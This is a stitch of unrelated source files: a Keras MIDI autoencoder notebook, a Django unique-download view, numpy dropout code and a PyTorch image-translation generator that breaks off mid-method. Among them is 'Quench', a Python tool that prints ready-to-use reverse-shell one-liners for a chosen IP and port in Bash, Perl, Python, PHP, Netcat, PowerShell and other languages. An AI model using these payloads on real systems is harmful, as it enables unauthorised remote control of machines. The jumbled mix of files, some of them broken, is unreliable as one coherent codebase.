from keras.layers import Input, Conv1D, MaxPooling1D, Flatten, Dense, BatchNormalization, LSTM, Bidirectional, GRU
from keras.layers import Conv2D, MaxPooling2D, Dropout, UpSampling2D
from keras.optimizers import Adam, SGD
from keras.losses import categorical_crossentropy
from keras.metrics import categorical_accuracy
from keras.utils import Sequence
from keras.optimizers import Adam, SGD, RMSprop, Adadelta
from keras.callbacks import TensorBoard
from keras.callbacks import ModelCheckpoint
# Utils
# %%
#------------------------------- CONSTANTS ----------------------------------------#
ata = 'test_data/Atavachron.mid'
noc = 'test_data/chno0902.mid'
noo = 'test_data/NoOneInTheWorld.mid'
DATA_FOLDER_PATH = 'dataset_piano_jazz'
MIDI_NOTES = np.arange(21, 109)
MIDI_NOTES_MAP = {
'21': 'A0',
'22': 'B0',
# TODO: Implement!
}
MIDI_PITCH_TO_INDEX_CONSTANT = np.min(MIDI_NOTES)
NOTE_ATTRIBUTES = 5
TICK_SCALER = 0.1
N_CHANNELS = 1
testFile = 'dataset_piano_jazz/AHouseis.mid'
midi = MidiFile(testFile)
# # %%
# for fname in os.listdir(DATA_FOLDER_PATH):
# midi = MidiFile(os.path.join(DATA_FOLDER_PATH, fname))
# if midi.type == 0:
# print(midi.tracks)
# # %%
# isinstance(midi.tracks[0][0], MetaMessage)
# %%
# for fname in os.listdir(DATA_FOLDER_PATH):
# midi = MidiFile(os.path.join(DATA_FOLDER_PATH, fname))
# print(midi)
# %%
# len(str(midi.tracks[0][10]).split(" ")) != NOTE_ATTRIBUTES
# # %%
# len(str(midi.tracks[0][10]).split(" "))
# # %%
# 'channel' not in str(midi.tracks[0][10])
# # %%
# midi.tracks
# findNoteDuration(69, midi.tracks[0][3:])
# # %%
# def print_trackk(track):
# '''
# Do Something
# '''
# for i, msg in enumerate(track):
# print(msg)
# return
# # %%
# for i, msg in enumerate(a.tracks[1]):
# print(msg)
# # %%
# tpb = midi.ticks_per_beat
# tempo = midi.tracks[0][2].tempo
# time = midi.tracks[1][2].time
# %%
#------------ TEST ----------------#
cnt = 0
notes = []
times = []
curr_time = 0
for j, message in enumerate(midi.tracks[1]):
if isinstance(message, Message) and message.type == 'note_on':
time = message.time
sec = tick2second(time, tpb, tempo)
notes.append(message.note)
curr_time += sec
times.append(curr_time)
# %%
# x = [0, 1, np.nan, 1, 2,np.nan, 1, 3]
# y = [56, 56, np.nan, 54, 54,np.nan, 45, 45]
# plt.plot(x, y)
# # %%
# nann = np.empty((2,10))
# nann[:] = np.nan
# # %%
# nann
# # %%
# max_line = 200
# for i in midi.play():
# print(i)
# if max_line == 0:
# break
# max_line -= 1
# # %%
# plt.figure(figsize=(14,6))
# plt.plot(ticks[:100], notes[:100])
# plt.show()
# # %%
# plt.figure(figsize=(30,8))
# plt.scatter(times[:100], notes[:100])
# %%
# Constants for instrument creation
PERC = True
INST = False
#------------------------------------------- Note Class ---------------------------------------------------#
class MEvent:
"""
MEvent is a fairly direct representation of Haskell Euterpea's MEvent type,
which is for event-style reasoning much like a piano roll representation.
eTime is absolute time for a tempo of 120bpm. So, 0.25 is a quarter note at
128bpm. The patch field should be a patch number, like the patch field of
the Instrument class.
"""
def __init__(self, eTime, pitch, duration, velocity=64, patch=(-1, INST)):
self.eTime = eTime # current time
self.pitch = pitch
self.duration = duration
self.velocity = velocity
self.patch = patch
self.sTime = eTime + self.duration # Stop time
def __str__(self):
return "MEvent(eTime: {0}, pitch: {1}, duration: {2}, velocity: {3}, patch: {4}, sTime: {5})".format(str(self.eTime), str(self.pitch), str(self.duration), str(self.velocity), str(self.patch), str(self.sTime))
def __repr__(self):
return str(self)
# %%
#------------------------------ Data Preprocessing ---------------------------------#
def findNoteDuration(pitch, channel, events):
'''
Scan through a list of MIDI events looking for a matching note-off.
A note-on of the same pitch will also count to end the current note,
assuming an instrument can't play the same note twice simultaneously.
If no note-off is found, the end of the track is used to truncate
the current note.
Adding one more case: Channel is mixed within tracks
:param pitch:
:param events:
:return:
'''
sumTicks = 0
for e in events:
if isinstance(e, MetaMessage) or len(str(e).split(" ")) != NOTE_ATTRIBUTES or 'channel' not in str(e):
continue
#sumTicks = sumTicks + e.tick
sumTicks = sumTicks + e.time
#c = e.__class__.__name__
c = e.type
#if c == "NoteOffEvent" or c == "NoteOnEvent":
if e.channel == channel and (c == "note_on" or c == "note_off"):
if e.note == pitch:
return sumTicks
return sumTicks
def tickToDur(ticks, resolution = 96):
'''
Convert from pythonmidi ticks back to PythonEuterpea durations
:param ticks: number of ticks
:param resolution: ticks_per_beat
:return:
'''
#return float(ticks) / float((RESOLUTION * 4))
return round(float(ticks) * TICK_SCALER)
# return ticks // (resolution * 4)
def getChannel(track):
'''
Determine the channel assigned to a track.
ASSUMPTION: all events in the track should have the same channel.
:param track:
:return:
'''
if len(track) > 0:
e = track[0]
#if (e.__class__.__name__ == "EndOfTrackEvent"): # mido has no end of track?
# return -1
if track[0].type == 'note_on' or track[0].type=='note_off':
return track[0].channel
return -1
def structurize_track(midi_track, ticks_per_beat, default_patch=-1):
'''
'''
currChannel = -1
currTick = 0
currPatch = default_patch
max_stop_tick = -np.Infinity
stred = []
for i, msg in enumerate(midi_track):
print(i, ": ", midi_track, ": ", msg)
_type = msg.type
if isinstance(msg, MetaMessage) or len(str(msg).split(" ")) != NOTE_ATTRIBUTES or 'channel' not in str(msg):
continue
currChannel = msg.channel
currTick += msg.time
if _type == 'program_change':
currPatch = msg.program
elif _type == 'control_change':
pass
elif _type == 'note_on':
# Finding durtation of the note!
tick_duration = findNoteDuration(msg.note, currChannel, midi_track[(i+1):])
# Create instance for this note!
# event = MEvent(tickToDur(currTick, ticks_per_beat), msg.note, tickToDur(tick_duration, ticks_per_beat), msg.velocity, currPatch)
event = MEvent(tickToDur(currTick), msg.note, tickToDur(tick_duration), msg.velocity, currPatch)
# stred.append([currChannel, event]) # Does Current channel matter in the whole picture?
stred.append(event)
elif _type == 'time_signature':
print("TO-DO: handle time signature event")
pass
elif _type == 'key_signature':
print("TO-DO: handle key signature event")
pass # need to handle this later
elif _type == 'note_off' or 'end_of_track':
pass # nothing to do here; note offs and track ends are handled in on-off matching in other cases.
else:
print("Unsupported event type (ignored): ", e.type, vars(e),e)
pass
return stred, tickToDur(currTick)
def map_note_to_graph(stred):
'''
Take a structured array of notes and map to graph
:param stred:
:return x:
:return y:
'''
x = []
y = []
for i, e in enumerate(stred):
x = np.append(x, [e.pitch, e.pitch, np.nan])
y = np.append(y, [e.eTime, e.eTime + e.duration, np.nan])
return x, y
def map_note_to_array(stred, max_tick):
'''
Create a 2D array out of a structures file!
:param stred: array of MEvent
:return array: a 2D array with shape (max_tick, note range) where x axis is pitch and y axis is time.
'''
array = np.zeros(shape=(max_tick, MIDI_NOTES.shape[0]))
for i, event in enumerate(stred):
eTime = event.eTime
sTime = event.sTime
pitch = event.pitch - MIDI_PITCH_TO_INDEX_CONSTANT
velocity = event.velocity
array[eTime:sTime, pitch] += velocity
return array.tolist()[500:1500]
# %%
class DataGenerator(Sequence):
"""
:param data_path: (String) This is the base folder data.
:param batch_size: (int32) This is the base folder data.
:param dim: (Tuple: (a, b, c)) 3D tuple shape of input dimension
:param n_channels: (int32) Number of channel.
:param n_classes: (int32) Number of classes.
:param shuffle: (boolean) Specify whether or not you want to shuffle the data to be trained.
"""
def __init__(self, data_path, batch_size=32, dim=(128,1308), n_channels=1,
n_classes=10, shuffle=True, validation_split=0.1):
"""
:var self.classes:
:var self.labels:
:var self.fname:
:var self.data:
:var self.dim:
:var self.batch_size:
:var self.list_IDs:
:var self.n_channels:
:var self.n_classes:
:var self.shuffle:
:var self.tokenizer:
:var self.data_path:
"""
self.fname = []
self.data = []
self.y = []
self.validation_split = validation_split
self.data_size = 0
self.data_shape = (None,None)
self.data_path = data_path
self.dim = dim
self.batch_size = batch_size
self.list_IDs = []
self.n_channels = n_channels
self.n_classes = n_classes
self.shuffle = shuffle
self.on_epoch_end()
self.load_data()
"""
:param data_path: (String) The actual base folder of data
"""
def load_data(self):
cnt = 0
for i, _file in enumerate(os.listdir(self.data_path)):
fname = os.path.join(self.data_path, _file)
# TODO: Check if the data is good
midi = MidiFile(fname)
if midi.type == 0:
print('{} has {} tracks'.format(fname, len(midi.tracks)))
self.fname.append(fname)
cnt +=1
print('Found {} midi file with unique track in data folder!'.format(cnt))
"""
Utilities method for classes
:param filename: Name of the file
"""
def load_midifile(filename):
return
# Temp extract data
def extract_data(self):
for fname in self.fname:
midi = MidiFile(fname)
tpb = midi.ticks_per_beat
print('Extracting {}'.format(fname))
if midi.type == 0:
# x, y = map_note_to_graph(structurize_track(midi.tracks[0], tpb))
# arr = map_note_to_array(*structurize_track(track, tpb))
st, maxTick = structurize_track(midi.tracks[0], tpb) # If type == 0 -> midi just have 1 track.
arr = map_note_to_array(st, maxTick)
self.data.append(arr)
self.y.append(arr)
self.data = np.expand_dims(np.asarray(self.data), axis=4)
self.y = np.expand_dims(np.asarray(self.y), axis=4)
def shuffle_data(self):
for i in range(len(self.y) // 2):
idx = random.randint(0, len(self.y) - 1)
tmp = self.y[i]
self.y[i] = self.y[idx]
self.y[idx] = tmp
def on_epoch_end(self):
self.indexes = np.arange(len(self.list_IDs))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, list_IDs_temp):
return
def __len__(self):
return
def __getitem__(self, index):
return
# %%
dataGen = DataGenerator(DATA_FOLDER_PATH)
# %%
dataGen.extract_data()
dataGen.shuffle_data()
# %%
x = dataGen.data
y = dataGen.y
# # %%
# y.shape
# # %%
# list(dataGen.data[0])
# # %%
# plt.imshow(x[0,:,:,0])
# %%
#------------------------------------------- Dummy Datagen ---------------------------------#
class DummyGen(Sequence):
def __init__(self, batch_size=32, dim=(None, None),
n_classes=10, shuffle=True, validation_split=0.1):
self.data_shape = (None,None)
self.dim = dim
self.batch_size = batch_size
self.list_IDs = []
self.n_channels = n_channels
self.n_classes = n_classes
self.shuffle = shuffle
self.on_epoch_end()
self.load_data()
def load_data(self):
def on_epoch_end(self):
self.indexes = np.arange(len(self.list_IDs))
if self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, list_IDs_temp):
return
def __len__(self):
return
def __getitem__(self, index):
return
# %%
#----------------------------------------- Models ----------------------------------#
def conv_autoencoder_1 (shape=(None, MIDI_NOTES.shape[0], N_CHANNELS)):
in_tensor = Input(shape=shape)
tensor = Conv2D(64, (1,1), activation = 'relu', padding='valid')(in_tensor)
tensor = MaxPooling2D(2)(tensor)
tensor = Conv2D(64, (1,1), activation = 'relu', padding='valid')(tensor)
tensor = MaxPooling2D(2)(tensor)
tensor = Conv2D(64, (1,1), activation = 'relu', padding='valid')(tensor)
tensor = MaxPooling2D(2)(tensor)
tensor = Conv2D(64, (1,1), activation = 'relu', padding='valid')(tensor)
tensor = UpSampling2D(2)(tensor)
tensor = Conv2D(64, (1,1), activation = 'relu', padding='valid')(tensor)
tensor = UpSampling2D(2)(tensor)
tensor = Conv2D(N_CHANNELS, (1,1), activation = 'relu', padding='valid')(tensor)
tensor = UpSampling2D(2)(tensor)
model = Model(in_tensor, tensor)
adam = Adam(lr = 10e-4)
model.compile(optimizer=adam, loss='mean_squared_error', metrics=['accuracy'])
return model
def conv_autoencoder_2(shape=(None, MIDI_NOTES.shape[0], N_CHANNELS)):
in_tensor = Input(shape=shape)
tensor = Conv2D(32, (3, 3), activation='relu', padding='same')(in_tensor)
tensor = MaxPooling2D((2, 2), padding='same')(tensor)
tensor = Conv2D(16, (3, 3), activation='relu', padding='same')(tensor)
tensor = MaxPooling2D((2, 2), padding='same')(tensor)
tensor = Conv2D(8, (3, 3), activation='relu', padding='same')(tensor)
encoded = MaxPooling2D((2, 2), padding='same')(tensor)
# at this point the representation is (4, 4, 8) i.e. 128-dimensional
tensor = Conv2D(8, (3, 3), activation='relu', padding='same')(encoded)
tensor = UpSampling2D((2, 2))(tensor)
tensor = Conv2D(16, (3, 3), activation='relu', padding='same')(tensor)
tensor = UpSampling2D((2, 2))(tensor)
tensor = Conv2D(32, (3, 3), activation='relu', padding='same')(tensor)
tensor = UpSampling2D((2, 2))(tensor)
decoded = Conv2D(1, (3, 3), activation='sigmoid', padding='same')(tensor)
autoencoder = Model(in_tensor, decoded)
adadelta = Adadelta(lr=10e-4)
autoencoder.compile(optimizer=adadelta, loss='mean_squared_error')
return autoencoder
def conv_vae():
# TODO: To implement!
return
# %%
autoencoder = conv_autoencoder_2()
autoencoder.summary()
# %%
filepath = 'checkpoint/'
checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose=1, save_best_only=True, mode='max')
history = autoencoder.fit(
x=np.zeros(shape=y.shape),
y=y,
batch_size=8,
epochs=200,
verbose=1,
validation_split=0.15,
callbacks=[TensorBoard(log_dir='/tmp/autoencoder'), checkpoint]
)
# %%
#----------------------------------------------- Predict -------------------------------------#
predict = autoencoder.predict(x[1:2])
# %%
#---------------------------------------------- Show --------------------------------------------#
plt.imshow(x[0,:,:,0])
# %%
#------------------------------------------------- Show -------------------------------------------#
plt.imshow(predict[0,:,:,0])
# %%
x[0,:,:,0]
# %%
predict[0,:,:,0]
# %%
# decoded_imgs = autoencoder.predict(x_test)
# n = 10
# plt.figure(figsize=(20, 4))
# for i in range(n):
# # display original
# ax = plt.subplot(2, n, i)
# plt.imshow(x_test[i].reshape(28, 28))
# plt.gray()
# ax.get_xaxis().set_visible(False)
# ax.get_yaxis().set_visible(False)
# # display reconstruction
# ax = plt.subplot(2, n, i + n)
# plt.imshow(decoded_imgs[i].reshape(28, 28))
# plt.gray()
# ax.get_xaxis().set_visible(False)
# ax.get_yaxis().set_visible(False)
# plt.show()
# %%
#---------------------------------------------------- MIDI Write file ----------------------------------#
composed = MidiFile()
composed.ticks_per_beat = 96
track = MidiTrack()
track.append(Message('note_on', note=64, velocity=64, time=0))
track.append(Message('note_on', note=62, velocity=64, time=200))
track.append(Message('note_on', note=60, velocity=64, time=200))
track.append(Message('note_off', note=64, velocity=64, time=200))
track.append(Message('note_off', note=62, velocity=64, time=200))
track.append(Message('note_off', note=60, velocity=64, time=200))
composed.tracks.append(track)
composed.save('composed.mid')
# %%
compo = MidiFile('composed.mid')
# %%
#--------------------------------------------------Test--------------------------------------------------------#
from keras.layers import LSTM, TimeDistributed
# Dummy LSTM model
def dummyModel():
in_tensor = Input (shape=(None, 5))
tensor = LSTM(128, activation='relu')(in_tensor)
tensor = Dense(1, activation='sigmoid')(tensor)
model = Model(in_tensor, tensor)
model.compile(optimizer='sgd', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
return model
# %%
model = dummyModel()
model.summary()
# %%
def train_generator():
while True:
sequence_length = np.random.randint(10, 100)
x_train = np.random.random((1000, sequence_length, 5))
# y_train will depend on past 5 timesteps of x
y_train = x_train[:,0,0]
y_train = to_categorical(y_train)
yield x_train, y_train
# %%
model.fit_generator(train_generator(), steps_per_epoch=30, epochs=10, verbose=1)
# %%
for x,y in train_generator():
print(x.shape)
# %%
from keras.layers import TimeDistributed
def lstm_3d():
in_tensor = Input(shape=(10, 10))
tensor = LSTM(64, activation='relu')(in_tensor)
tensor = Dense(10, activation='sigmoid')(tensor)
model = Model(in_tensor, tensor)
model.compile(optimizer='sgd', loss='categorical_crossentropy', metrics=['acc'])
return model
# %%
model = lstm_3d()
model.summary()
# %%
# %%
x = np.arange(10000).reshape((100,10,10))
y = np.zeros(shape=(100,10))
for i in range(300):
a = random.randint(0, 99)
b = random.randint(0, 9)
y[a][b] = 1
# %%
model.fit(x, y, batch_size=10, epochs=100)
# %%
model.predict(x[:5]) |
#!/usr/bin/python3
import os
import sys
import getopt
import subprocess
import requests
import pathlib
def main(argv):
global ipaddress
info = """Arguments:\n -i, --ip ==> IP Address\n -p, --port ==> Port Number\n -t, --type ==> Payload Type\n --update ==> Update To The Latest Version\n --install ==> Install To '/usr/local/bin/' Directory\nUsage:\n quench -i <IP Address> -p <Port Number> -t <Payload Type>\n quench -i 127.0.0.1 -p 4444 -t php\n quench --ip 192.168.1.1 --port 1337 --type awk\n quench --update\n quench --install\nPayload Types:\n Bash ==> sh\n Perl ==> pl\n Python ==> py\n Socat ==> sc\n PHP ==> php\n Ruby ==> rb\n Netcat ==> nc\n Golang ==> go\n AWK ==> awk\n Lua ==> lua\n PowerShell ==> ps"""
ip = ''
port = ''
file = pathlib.Path("/usr/local/bin/quench")
url = "https://enesozeser.com/"
timeout = 5
try:
requests.get(url, timeout=timeout)
internet = 1
except (requests.ConnectionError, requests.Timeout):
internet = 0
if internet == 1:
getpublic = subprocess.Popen("dig +short myip.opendns.com @resolver1.opendns.com", shell=True, stdout=subprocess.PIPE).stdout
public = getpublic.read()
getlocal = subprocess.Popen("hostname -I | awk '{print $1}'", shell=True, stdout=subprocess.PIPE).stdout
local = getlocal.read()
ipaddress = """IP Address:\n Local(eth/wlan) IP Address ==> %s\n Public IP Address ==> %s""" %(local[:-1].decode(), public[:-1].decode())
if len(sys.argv) == 1:
print(info)
if internet == 1:
print(ipaddress)
try:
opts, args = getopt.getopt(argv,"i:p:t:",["ip=","port=","type=","update","install"])
except getopt.GetoptError:
print(info)
if internet == 1:
print(ipaddress)
sys.exit(2)
for opt, arg in opts:
if opt in ("-i", "--ip"):
ip = arg
elif opt in ("-p", "--port"):
port = arg
elif opt in "--update":
if internet == 1:
if file.exists():
os.system('rm -f /usr/local/bin/quench')
os.system('wget https://raw.githubusercontent.com/enesozeser/Quench/master/quench.py -P /usr/local/bin/')
os.system('mv /usr/local/bin/quench.py /usr/local/bin/quench')
os.system('chmod a+x /usr/local/bin/quench')
os.system('sleep 2')
print("Quench is updated. Use 'quench' command for all information.")
else:
print("Quench is not installed. Use './quench --install' command before updating.")
else:
print("Quench could not be updated. Check your internet connection.")
elif opt in "--install":
if file.exists():
print("Quench is already installed. Use 'quench' command for all information.")
else:
os.system('cp quench.py /usr/local/bin/')
os.system('mv /usr/local/bin/quench.py /usr/local/bin/quench')
os.system('chmod a+x /usr/local/bin/quench')
os.system('sleep 2')
print("Quench is installed. Use 'quench' command for all information.")
if opt in ("-t", "--type"):
type = arg
if type == "sh":
print("""Bash-TCP ==> bash -i >& /dev/tcp/%s/%s 0>&1""" %(ip,port))
print("""Bash-TCP ==> 0<&196;exec 196<>/dev/tcp/%s/%s; sh <&196 >&196 2>&196""" %(ip, port))
print("""Bash-UDP ==> bash -i >& /dev/udp/%s/%s 0>&1""" %(ip,port))
print("""Bash-UDP ==> 0<&196;exec 196<>/dev/udp/%s/%s; sh <&196 >&196 2>&196""" %(ip,port))
elif type == "pl":
print("""Perl ==> perl -e 'use Socket;$i="%s";$p=%s;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'""" %(ip,port))
print("""Perl ==> perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"%s:%s");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'""" %(ip,port))
elif type == "py":
print("""Python-IPv4 ==> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'""" %(ip,port))
print("""Python-IPv4 ==> export RHOST="%s";export RPORT=%s;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'""" %(ip,port))
print("""Python-IPv6 ==> python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("%s",%s,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'""" %(ip,port))
print("""Python-IPv6 ==> python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'""" %(ip,port))
elif type == "php":
print("""PHP ==> php -r '$sock=fsockopen("%s",%s);exec("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
print("""PHP ==> php -r '$sock=fsockopen("%s",%s);shell_exec("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
print("""PHP ==> php -r '$sock=fsockopen("%s",%s);`/bin/sh -i <&3 >&3 2>&3`;'""" %(ip,port))
print("""PHP ==> php -r '$sock=fsockopen("%s",%s);system("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
print("""PHP ==> php -r '$sock=fsockopen("%s",%s);passthru("/bin/sh -i <&3 >&3 2>&3");'""" %(ip,port))
print("""PHP ==> php -r '$sock=fsockopen("%s",%s);popen("/bin/sh -i <&3 >&3 2>&3", "r");'""" %(ip,port))
print("""PHP ==> php -r '$sock=fsockopen("%s",%s);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'""" %(ip,port))
elif type == "sc":
print("""Socat ==> socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:%s:%s""" %(ip,port))
elif type == "rb":
print("""Ruby ==> ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["%s"],ENV["%s"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' """ %(ip,port))
elif type == "nc":
print("""Netcat-TCP ==> nc %s %s -e /bin/bash""" %(ip,port))
print("""Netcat-UDP ==> nc --udp %s %s -e /bin/bash""" %(ip,port))
elif type == "go":
print("""Golang ==> echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","%s:%s");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go""" %(ip,port))
elif type == "awk":
print("""AWK ==> awk 'BEGIN {s = "/inet/tcp/0/%s/%s"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null""" %(ip,port))
elif type == "lua":
print("""Lua ==> lua -e "require('socket');require('os');t=socket.tcp();t:connect('%s','%s');os.execute('/bin/sh -i <&3 >&3 2>&3');" """ %(ip,port))
elif type == "ps":
print("""PowerShell ==> $client = New-Object System.Net.Sockets.TCPClient("%s",%s);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()""" %(ip,port))
else:
print("You entered invalid payload type. You must to use one of these ==> sh, pl, py, socat, php, rb, nc, go, awk, lua, ps")
if __name__ == "__main__":
main(sys.argv[1:])
|
__author__ = 'ibrahim (at) sikilabs (dot) com'
__licence__ = 'MIT'
from django.shortcuts import RequestContext
from django.template import loader
from django.http import HttpResponse
from django.conf import settings
import datetime
import os
from main.unique.models import UniqueUrl
# import unique url object
modlist = settings.UNIQUE_URL_OBJECT.split(".")
_module = ".".join(modlist[:len(modlist) - 1])
_class = modlist[-1]
module_to_import_from = __import__(_module, fromlist=[_class])
class_to_import = getattr(module_to_import_from, _class)
def get_file(request, unique_url):
"""
get file or redirect to error page
"""
my_unique = UniqueUrl.objects.get(url=unique_url)
if my_unique.clics < settings.UNIQUE_MAX_CLICS:
if datetime.date.today() < my_unique.expiration_date:
my_object_id = my_unique.decode_url(my_unique.url_hash,
my_unique.url)[2]
my_object = class_to_import.objects.get(id=my_object_id)
myfile = open(settings.MEDIA_ROOT + my_object.path, 'r')
fname, extension = os.path.splitext(my_object.path)
response = HttpResponse(myfile,
content_type='application/' + extension)
response['Content-Disposition'] = "attachment; filename=" + my_object.original_filename
my_unique.clics += 1
my_unique.save()
return response
else:
t = loader.get_template('unique/download_error.html')
c = RequestContext(request, {'status': 1}) # expiration passed
return HttpResponse(t.render(c))
else:
t = loader.get_template('unique/download_error.html')
c = RequestContext(request, {'status': 2}) # max download reached
return HttpResponse(t.render(c))
def generate_url(request, object_id):
"""
generate unique url from object id
"""
unique_object = class_to_import.objects.get(id=object_id)
try:
my_unique = UniqueUrl.objects.get(user=request.user,
ref_object=unique_object)
except UniqueUrl.DoesNotExist:
my_unique = UniqueUrl.objects.create(user=request.user,
expiration_date=settings.UNIQUE_EXP_DATE,
ref_object=unique_object, clics=0)
my_unique.encode_url()
|
def forward(x, W1, W2, W3, training=False):
z1 = np.dot(x, W1)
y1 = np.tanh(z1)
z2 = np.dot(y1, W2)
y2 = np.tanh(z2)
# Dropout in layer 2
if training:
m2 = np.random.binomial(1, 0.5, size=z2.shape)
else:
m2 = 0.5
y2 *= m2
z3 = np.dot(y2, W3)
y3 = z3 # linear output
return y1, y2, y3, m2
def backward(x, y1, y2, y3, m2, t, W1, W2, W3):
dC_dz3 = dC(y3, t)
dC_dW3 = np.dot(y2.T, dC_dz3)
dC_dy2 = np.dot(dC_dz3, W3.T)
dC_dz2 = dC_dy2 * dtanh(y2) * m2
dC_dW2 = np.dot(y1.T, dC_dz2)
dC_dy1 = np.dot(dC_dz2, W2.T)
dC_dz1 = dC_dy1 * dtanh(y1)
dC_dW1 = np.dot(x.T, dC_dz1)
return dC_dW1, dC_dW2, dC_dW3
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from models.networks.base_network import BaseNetwork
from models.networks.normalization import get_norm_layer
from models.networks.architecture import ResnetBlock as ResnetBlock
from models.networks.architecture import FADEResnetBlock as FADEResnetBlock
from models.networks.stream import Stream as Stream
from models.networks.AdaIN.function import adaptive_instance_normalization as FAdaIN
class TSITGenerator(BaseNetwork):
@staticmethod
def modify_commandline_options(parser, is_train):
parser.set_defaults(norm_G='spectralfadesyncbatch3x3')
parser.add_argument('--num_upsampling_layers',
choices=('normal', 'more', 'most'), default='more',
help="If 'more', adds upsampling layer between the two middle resnet blocks."
"If 'most', also add one more upsampling + resnet layer at the end of the generator."
"We only use 'more' as the default setting.")
return parser
def __init__(self, opt):
super().__init__()
self.opt = opt
nf = opt.ngf
self.content_stream = Stream(self.opt)
self.style_stream = Stream(self.opt) if not self.opt.no_ss else None
self.sw, self.sh = self.compute_latent_vector_size(opt)
if opt.use_vae:
# In case of VAE, we will sample from random z vector
self.fc = nn.Linear(opt.z_dim, 16 * nf * self.sw * self.sh)
else:
# Otherwise, we make the network deterministic by starting with
# downsampled segmentation map (content) instead of random z
self.fc = nn.Conv2d(self.opt.semantic_nc, 16 * nf, 3, padding=1)
self.head_0 = FADEResnetBlock(16 * nf, 16 * nf, opt)
self.G_middle_0 = FADEResnetBlock(16 * nf, 16 * nf, opt)
self.G_middle_1 = FADEResnetBlock(16 * nf, 16 * nf, opt)
self.up_0 = FADEResnetBlock(16 * nf, 8 * nf, opt)
self.up_1 = FADEResnetBlock(8 * nf, 4 * nf, opt)
self.up_2 = FADEResnetBlock(4 * nf, 2 * nf, opt)
self.up_3 = FADEResnetBlock(2 * nf, 1 * nf, opt)
final_nc = nf
if opt.num_upsampling_layers == 'most':
self.up_4 = FADEResnetBlock(1 * nf, nf // 2, opt)
final_nc = nf // 2
self.conv_img = nn.Conv2d(final_nc, 3, 3, padding=1)
self.up = nn.Upsample(scale_factor=2)
def compute_latent_vector_size(self, opt):
if opt.num_upsampling_layers == 'normal':
num_up_layers = 6
elif opt.num_upsampling_layers == 'more':
num_up_layers = 7
elif opt.num_upsampling_layers == 'most':
num_up_layers = 8
else:
raise ValueError('opt.num_upsampling_layers [%s] not recognized' %
opt.num_upsampling_layers)
sw = opt.crop_size // (2**num_up_layers)
sh = round(sw / opt.aspect_ratio)
return sw, sh
def fadain_alpha(self, content_feat, style_feat, alpha=1.0, c_mask=None, s_mask=None):
# FAdaIN performs AdaIN on the multi-scale feature representations
assert 0 <= alpha <= 1
t = FAdaIN(content_feat, style_feat, c_mask, s_mask)
t = alpha * t + (1 - alpha) * content_feat
return t
def forward(self, input, real, z=None):
content = input
style = real
ft0, ft1, ft2, ft3, ft4, ft5, ft6, ft7 = self.content_stream(content)
sft0, sft1, sft2, sft3, sft4, sft5, sft6, sft7 = self.style_stream(style) if not self.opt.no_ss else [None] * 8
if self.opt.use_vae:
# we sample z from unit normal and reshape the tensor
if z is None:
z = torch.randn(content.size(0), self.opt.z_dim,
dtype=torch.float32, device=content.get_device())
x = self.fc(z)
x = x.view(-1, 16 * self.opt.ngf, self.sh, self.sw)
else:
if self.opt.task == 'SIS':
# following SPADE, downsample segmap and run convolution for SIS
x = F.interpolate(content, size=(self.sh, self.sw))
else:
# sample random noise
x = torch.randn(content.size(0), 3, self.sh, self.sw, dtype=torch.float32, device=content.get_device())
x = self.fc(x)
x = self.fadain_alpha(x, sft7, alpha=self.opt.alpha) if not self.opt.no_ss else x
x = self.head_0(x, ft7)
x = self.up(x)
x = self.fadain_alpha(x, sft6, alpha=self.opt.alpha) if not self.opt.no_ss else x
x = self.G_middle_0(x, ft6)
if self.opt.num_upsampling_layers == 'more' or \
self.opt.num_upsampling_layers == 'most':
x = self.up(x)
x = self.fadain_alpha(x, sft5, alpha=self.opt.alpha) if not self.opt.no_ss else x
x = self.G_middle_1(x, ft5)
x = self.up(x)
x = self.fadain_alpha(x, sft4, alpha=self.opt.alpha) if not self.opt.no_ss else x
